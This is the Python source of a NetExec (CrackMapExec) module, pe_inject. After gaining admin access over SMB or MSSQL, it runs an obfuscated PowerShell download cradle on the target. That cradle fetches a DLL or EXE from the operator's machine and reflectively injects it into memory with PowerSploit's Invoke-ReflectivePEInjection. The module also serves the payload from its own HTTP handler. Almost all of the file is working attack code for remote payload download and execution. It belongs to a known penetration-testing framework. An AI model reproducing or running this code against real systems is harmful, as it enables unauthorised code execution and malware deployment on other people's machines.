NetExec/cme/modules/pe_inject.py

from cme.helpers.powershell import *
from sys import exit
import os

class CMEModule:
    '''
        Downloads the specified DLL/EXE and injects it into memory using PowerSploit's Invoke-ReflectivePEInjection.ps1 script
        Module by @byt3bl33d3r
    '''
    name = 'pe_inject'
    description = "Downloads the specified DLL/EXE and injects it into memory"
    supported_protocols = ['smb', 'mssql']
    opsec_safe = True
    multiple_hosts = True

    def options(self, context, module_options):
        '''
            PATH     Path to dll/exe to inject
            PROCID   Process ID to inject into (default: current powershell process)
            EXEARGS  Arguments to pass to the executable being reflectively loaded (default: None)
        '''

        if not 'PATH' in module_options:
            context.log.error('PATH option is required!')
            exit(1)

        self.payload_path = os.path.expanduser(module_options['PATH'])
        if not os.path.exists(self.payload_path):
            context.log.error('Invalid path to EXE/DLL!')
            exit(1)

        self.procid  = None
        self.exeargs = None

        if 'PROCID' in module_options:
            self.procid = module_options['PROCID']

        if 'EXEARGS' in module_options:
            self.exeargs = module_options['EXEARGS']

        self.ps_script = obfs_ps_script('powersploit/CodeExecution/Invoke-ReflectivePEInjection.ps1')

    def on_admin_login(self, context, connection):

        payload = """
        $WebClient = New-Object System.Net.WebClient;
        [Byte[]]$bytes = $WebClient.DownloadData('{server}://{addr}:{port}/{pefile}');
        Invoke-ReflectivePEInjection -PEBytes $bytes""".format(server=context.server,
                                                     port=context.server_port,
                                                     addr=context.localip,
                                                     pefile=os.path.basename(self.payload_path))

        if self.procid:
            payload += ' -ProcessID {}'.format(self.procid)

        if self.exeargs:
            payload += ' -ExeArgs "{}"'.format(self.exeargs)

        launcher = gen_ps_iex_cradle(context, 'Invoke-ReflectivePEInjection.ps1', payload, post_back=False)

        connection.ps_execute(launcher, force_ps32=True)
        context.log.success('Executed payload')

    def on_request(self, context, request):
        if 'Invoke-ReflectivePEInjection.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            request.wfile.write(self.ps_script)

        elif os.path.basename(self.payload_path) == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            request.stop_tracking_host()

            with open(self.payload_path, 'rb') as payload:
                request.wfile.write(payload.read())

        else:
            request.send_response(404)
            request.end_headers()